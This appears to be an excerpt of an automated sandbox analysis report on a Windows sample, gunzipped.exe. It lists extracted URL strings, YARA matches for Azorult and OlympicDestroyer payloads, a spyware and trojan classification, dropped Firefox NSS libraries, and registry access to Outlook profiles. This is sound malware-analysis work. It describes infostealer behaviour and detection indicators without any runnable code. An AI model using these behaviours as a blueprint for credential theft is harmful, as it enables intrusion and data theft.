                    Source: gunzipped.exe, 00000001.00000003.241067654.0000000005674000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnI
                    Source: gunzipped.exe, 00000001.00000003.240832501.00000000056AD000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnj
                    Source: gunzipped.exe, 00000001.00000003.240832501.00000000056AD000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cns
                    Source: gunzipped.exe, 00000001.00000002.257287846.0000000005830000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                    Source: gunzipped.exe, 00000001.00000002.257287846.0000000005830000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                    Source: gunzipped.exe, 00000001.00000002.257287846.0000000005830000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                    Source: gunzipped.exe, 00000001.00000002.257287846.0000000005830000.00000002.00000001.sdmp, gunzipped.exe, 00000001.00000003.242706924.0000000005674000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: gunzipped.exe, 00000001.00000003.242706924.0000000005674000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/2
                    Source: gunzipped.exe, 00000001.00000003.242706924.0000000005674000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/;
                    Source: gunzipped.exe, 00000001.00000003.242706924.0000000005674000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Verd
                    Source: gunzipped.exe, 00000001.00000003.242706924.0000000005674000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
                    Source: gunzipped.exe, 00000001.00000003.242706924.0000000005674000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/&
                    Source: gunzipped.exe, 00000001.00000003.242706924.0000000005674000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/A
                    Source: gunzipped.exe, 00000001.00000003.242706924.0000000005674000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/l
                    Source: gunzipped.exe, 00000001.00000003.242706924.0000000005674000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/z
                    Source: mozglue.dll.3.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                    Source: gunzipped.exe, 00000003.00000003.274865988.0000000004150000.00000004.00000001.sdmp, softokn3.dll.3.drString found in binary or memory: http://www.mozilla.com0
                    Source: gunzipped.exe, 00000003.00000002.284563787.0000000000C9D000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp
                    Source: gunzipped.exe, 00000003.00000003.283052268.00000000033A0000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/Jhttps://login.live.com/login.srf.c
                    Source: gunzipped.exe, 00000003.00000002.284437491.0000000000C57000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
                    Source: gunzipped.exe, 00000003.00000002.284437491.0000000000C57000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp.c_
                    Source: gunzipped.exe, 00000003.00000003.283052268.00000000033A0000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/Zhttps://contextual.media.net/medianet.phpZhttps://contextual.media.net/med
                    Source: gunzipped.exe, 00000001.00000002.257287846.0000000005830000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: gunzipped.exe, 00000001.00000003.238889129.0000000005691000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.coma-d
                    Source: gunzipped.exe, 00000001.00000003.239065899.0000000005694000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.comes
                    Source: gunzipped.exe, 00000001.00000003.238889129.0000000005691000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.comn-u
                    Source: gunzipped.exe, 00000001.00000002.257287846.0000000005830000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: gunzipped.exe, 00000001.00000003.240102819.0000000005679000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: gunzipped.exe, 00000001.00000003.240102819.0000000005679000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.krend
                    Source: gunzipped.exe, 00000001.00000002.257287846.0000000005830000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
                    Source: gunzipped.exe, 00000001.00000003.239257578.000000000568B000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com(Yk
                    Source: gunzipped.exe, 00000001.00000003.239302434.000000000568B000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comlic:Ye
                    Source: gunzipped.exe, 00000001.00000002.257287846.0000000005830000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
                    Source: gunzipped.exe, 00000001.00000002.257287846.0000000005830000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: gunzipped.exe, 00000001.00000002.257287846.0000000005830000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: gunzipped.exe, 00000003.00000003.277570895.0000000000CB5000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4842492154761;g
                    Source: gunzipped.exe, 00000003.00000003.283052268.00000000033A0000.00000004.00000001.sdmp, gunzipped.exe, 00000003.00000003.277570895.0000000000CB5000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=58648497779
                    Source: gunzipped.exe, 00000003.00000003.277570895.0000000000CB5000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=3931852
                    Source: gunzipped.exe, 00000003.00000003.283052268.00000000033A0000.00000004.00000001.sdmp, gunzipped.exe, 00000003.00000002.284563787.0000000000C9D000.00000004.00000020.sdmpString found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gt
                    Source: gunzipped.exe, 00000003.00000003.277570895.0000000000CB5000.00000004.00000001.sdmpString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gtm=
                    Source: gunzipped.exe, 00000003.00000003.283052268.00000000033A0000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.p
                    Source: gunzipped.exe, 00000003.00000003.283052268.00000000033A0000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.php
                    Source: gunzipped.exe, 00000003.00000003.277570895.0000000000CB5000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
                    Source: gunzipped.exe, 00000003.00000003.283052268.00000000033A0000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.phpd=
                    Source: gunzipped.exe, 00000003.00000002.284437491.0000000000C57000.00000004.00000020.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
                    Source: gunzipped.exe, 00000003.00000003.277570895.0000000000CB5000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1LMEM
                    Source: gunzipped.exe, 00000003.00000002.284437491.0000000000C57000.00000004.00000020.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
                    Source: gunzipped.exe, 00000003.00000003.277570895.0000000000CB5000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1LMEM
                    Source: gunzipped.exeString found in binary or memory: https://dotbit.me/a/
                    Source: gunzipped.exe, 00000003.00000003.277570895.0000000000CB5000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601451842&rver=6.0.5286.0&wp=MBI_SSL&wre
                    Source: gunzipped.exe, 00000003.00000003.283052268.00000000033A0000.00000004.00000001.sdmpString found in binary or memory: https://login.microsoftonline.com/common/oauth2/authoriz
                    Source: gunzipped.exe, 00000003.00000003.283052268.00000000033A0000.00000004.00000001.sdmpString found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize
                    Source: gunzipped.exe, 00000003.00000003.277570895.0000000000CB5000.00000004.00000001.sdmpString found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e
                    Source: gunzipped.exe, 00000003.00000003.274865988.0000000004150000.00000004.00000001.sdmp, softokn3.dll.3.drString found in binary or memory: https://www.digicert.com/CPS0
                    Source: gunzipped.exe, 00000003.00000002.284563787.0000000000C9D000.00000004.00000020.sdmpString found in binary or memory: https://www.google.com/chrome/
                    Source: gunzipped.exe, 00000003.00000002.284563787.0000000000C9D000.00000004.00000020.sdmpString found in binary or memory: https://www.google.com/chrome//J
                    Source: gunzipped.exe, 00000003.00000003.283052268.00000000033A0000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/Fs
                    Source: gunzipped.exe, 00000003.00000003.277570895.0000000000CB5000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
                    Source: gunzipped.exe, 00000003.00000003.277570895.0000000000CB5000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.pngS8
                    Source: gunzipped.exe, 00000003.00000003.277570895.0000000000CB5000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.pngt
                    Source: gunzipped.exe, 00000003.00000002.284437491.0000000000C57000.00000004.00000020.sdmp, gunzipped.exe, 00000003.00000003.277570895.0000000000CB5000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
                    Source: gunzipped.exe, 00000003.00000003.277570895.0000000000CB5000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0#
                    Source: gunzipped.exe, 00000003.00000003.277570895.0000000000CB5000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0)
                    Source: gunzipped.exe, 00000003.00000003.277570895.0000000000CB5000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0LMEM
                    Source: gunzipped.exe, 00000003.00000003.277570895.0000000000CB5000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0p
                    Source: gunzipped.exe, 00000003.00000003.283052268.00000000033A0000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.htmlK

                    System Summary:

                    barindex
                    Malicious sample detected (through community Yara rule)Show sources
                    Source: 00000003.00000002.283965391.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Azorult Payload Author: kevoreilly
                    Source: 3.2.gunzipped.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
                    Source: 3.2.gunzipped.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
                    Source: 3.3.gunzipped.exe.39186c4.155.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer Payload Author: kevoreilly
                    Source: 3.3.gunzipped.exe.393a6b1.154.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer Payload Author: kevoreilly
                    Source: 3.3.gunzipped.exe.39a5e02.153.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer Payload Author: kevoreilly
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_016F61081_2_016F6108
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_016F49A81_2_016F49A8
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_016F84301_2_016F8430
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_016FB8B81_2_016FB8B8
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_016F9B701_2_016F9B70
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_016F33381_2_016F3338
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_016F9FF81_2_016F9FF8
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_016F2A501_2_016F2A50
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_016FB6201_2_016FB620
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_016F2E001_2_016F2E00
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_016F26E81_2_016F26E8
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_016F42A01_2_016F42A0
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_016F8EA01_2_016F8EA0
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_016F52801_2_016F5280
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_016F41F71_2_016F41F7
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_016F2DF11_2_016F2DF1
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_016F499A1_2_016F499A
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_016FCC621_2_016FCC62
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_016FCC701_2_016FCC70
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_016F80211_2_016F8021
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_016F84201_2_016F8420
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_016F80301_2_016F8030
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_016F60191_2_016F6019
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_016FB8AA1_2_016FB8AA
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_016F376A1_2_016F376A
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_016FB3601_2_016FB360
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_016F9B601_2_016F9B60
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_016F37781_2_016F3778
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_016F93701_2_016F9370
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_016FB3521_2_016FB352
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_016F7B081_2_016F7B08
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_016FD3001_2_016FD300
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_016F9FE81_2_016F9FE8
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_016F93801_2_016F9380
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_016F82601_2_016F8260
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_016F52701_2_016F5270
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_016F2A401_2_016F2A40
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_016F8E561_2_016F8E56
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_016F82501_2_016F8250
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_016F7E211_2_016F7E21
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_016F7E301_2_016F7E30
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_016FB6101_2_016FB610
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_016F7AFA1_2_016F7AFA
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_016FD2F01_2_016FD2F0
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_016FA2C81_2_016FA2C8
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_016F26D81_2_016F26D8
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_016FA2D81_2_016FA2D8
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: String function: 00403BF4 appears 46 times
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: String function: 004062FC appears 42 times
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: String function: 00404E98 appears 86 times
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: String function: 00404EC0 appears 33 times
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: String function: 0040300C appears 32 times
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: String function: 004034E4 appears 33 times
                    Source: api-ms-win-core-debug-l1-1-0.dll.3.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-errorhandling-l1-1-0.dll.3.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-datetime-l1-1-0.dll.3.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-console-l1-1-0.dll.3.drStatic PE information: No import functions for PE file found
                    Source: gunzipped.exe, 00000001.00000002.253408009.0000000000CF0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameAuz vs gunzipped.exe
                    Source: gunzipped.exe, 00000001.00000002.262457843.0000000007360000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs gunzipped.exe
                    Source: gunzipped.exe, 00000001.00000002.263060483.0000000007680000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs gunzipped.exe
                    Source: gunzipped.exe, 00000001.00000002.257237268.0000000005810000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSmartFormat.dll8 vs gunzipped.exe
                    Source: gunzipped.exe, 00000003.00000003.268805106.0000000003724000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs gunzipped.exe
                    Source: gunzipped.exe, 00000003.00000003.274190761.00000000026B4000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamevcruntime140.dll^ vs gunzipped.exe
                    Source: gunzipped.exe, 00000003.00000003.274865988.0000000004150000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamenssdbm3.dll0 vs gunzipped.exe
                    Source: gunzipped.exe, 00000003.00000003.275174463.00000000034A0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamenss3.dll0 vs gunzipped.exe
                    Source: gunzipped.exe, 00000003.00000003.275174463.00000000034A0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamesoftokn3.dll0 vs gunzipped.exe
                    Source: gunzipped.exe, 00000003.00000003.275174463.00000000034A0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs gunzipped.exe
                    Source: gunzipped.exe, 00000003.00000003.275123945.000000000342C000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemsvcp140.dll^ vs gunzipped.exe
                    Source: gunzipped.exe, 00000003.00000003.269486087.0000000003728000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs gunzipped.exe
                    Source: gunzipped.exe, 00000003.00000003.269240179.0000000003728000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamefreebl3.dll0 vs gunzipped.exe
                    Source: gunzipped.exe, 00000003.00000002.284083374.0000000000550000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameAuz vs gunzipped.exe
                    Source: gunzipped.exe, 00000003.00000002.284666439.0000000002670000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs gunzipped.exe
                    Source: gunzipped.exeBinary or memory string: OriginalFilenameAuz vs gunzipped.exe
                    Source: gunzipped.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                    Source: 00000003.00000002.283965391.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
                    Source: 3.2.gunzipped.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
                    Source: 3.2.gunzipped.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
                    Source: 3.3.gunzipped.exe.39186c4.155.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
                    Source: 3.3.gunzipped.exe.393a6b1.154.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
                    Source: 3.3.gunzipped.exe.39a5e02.153.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
                    Source: gunzipped.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@3/50@0/1
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 3_2_00416290 LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,GetCurrentProcessId,3_2_00416290
                    Source: C:\Users\user\Desktop\gunzipped.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\gunzipped.exe.logJump to behavior
                    Source: C:\Users\user\Desktop\gunzipped.exeMutant created: \Sessions\1\BaseNamedObjects\AE86A6D5-F9414907-A7566F0F-BE57D046-B54D7B81F
                    Source: C:\Users\user\Desktop\gunzipped.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\Jump to behavior
                    Source: gunzipped.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dllJump to behavior
                    Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                    Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                    Source: C:\Users\user\Desktop\gunzipped.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: gunzipped.exe, 00000003.00000003.275174463.00000000034A0000.00000004.00000001.sdmp, softokn3.dll.3.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                    Source: gunzipped.exe, 00000003.00000003.275174463.00000000034A0000.00000004.00000001.sdmp, nss3.dll.3.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: gunzipped.exe, 00000003.00000003.275174463.00000000034A0000.00000004.00000001.sdmp, softokn3.dll.3.drBinary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
                    Source: gunzipped.exe, 00000003.00000003.275174463.00000000034A0000.00000004.00000001.sdmp, softokn3.dll.3.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                    Source: gunzipped.exe, 00000003.00000003.275174463.00000000034A0000.00000004.00000001.sdmp, nss3.dll.3.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                    Source: gunzipped.exe, 00000003.00000003.275174463.00000000034A0000.00000004.00000001.sdmp, nss3.dll.3.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                    Source: gunzipped.exe, 00000003.00000003.275174463.00000000034A0000.00000004.00000001.sdmp, nss3.dll.3.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                    Source: gunzipped.exe, 00000003.00000003.275174463.00000000034A0000.00000004.00000001.sdmp, softokn3.dll.3.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                    Source: gunzipped.exe, 00000003.00000003.275174463.00000000034A0000.00000004.00000001.sdmp, softokn3.dll.3.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                    Source: gunzipped.exe, 00000003.00000003.275174463.00000000034A0000.00000004.00000001.sdmp, softokn3.dll.3.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                    Source: gunzipped.exe, 00000003.00000003.275174463.00000000034A0000.00000004.00000001.sdmp, softokn3.dll.3.drBinary or memory string: SELECT ALL id FROM %s;
                    Source: gunzipped.exe, 00000003.00000003.275174463.00000000034A0000.00000004.00000001.sdmp, softokn3.dll.3.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                    Source: gunzipped.exe, 00000003.00000003.275174463.00000000034A0000.00000004.00000001.sdmp, softokn3.dll.3.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                    Source: gunzipped.exe, 00000003.00000003.275174463.00000000034A0000.00000004.00000001.sdmp, nss3.dll.3.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: gunzipped.exe, 00000003.00000003.275174463.00000000034A0000.00000004.00000001.sdmp, nss3.dll.3.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: gunzipped.exe, 00000003.00000003.275174463.00000000034A0000.00000004.00000001.sdmp, nss3.dll.3.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                    Source: gunzipped.exe, 00000003.00000003.275174463.00000000034A0000.00000004.00000001.sdmp, nss3.dll.3.drBinary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
                    Source: gunzipped.exe, 00000003.00000003.275174463.00000000034A0000.00000004.00000001.sdmp, nss3.dll.3.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                    Source: gunzipped.exe, 00000003.00000003.275174463.00000000034A0000.00000004.00000001.sdmp, softokn3.dll.3.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                    Source: gunzipped.exeVirustotal: Detection: 55%
                    Source: gunzipped.exeReversingLabs: Detection: 75%
                    Source: unknownProcess created: C:\Users\user\Desktop\gunzipped.exe 'C:\Users\user\Desktop\gunzipped.exe'
                    Source: C:\Users\user\Desktop\gunzipped.exeProcess created: C:\Users\user\Desktop\gunzipped.exe {path}
                    Source: C:\Users\user\Desktop\gunzipped.exeProcess created: C:\Users\user\Desktop\gunzipped.exe {path}Jump to behavior
                    Source: C:\Users\user\Desktop\gunzipped.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                    Source: C:\Users\user\Desktop\gunzipped.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\gunzipped.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
                    Source: gunzipped.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: C:\Users\user\Desktop\gunzipped.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dllJump to behavior
                    Source: gunzipped.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274743641.0000000004128000.00000004.00000001.sdmp, api-ms-win-crt-locale-l1-1-0.dll.3.dr
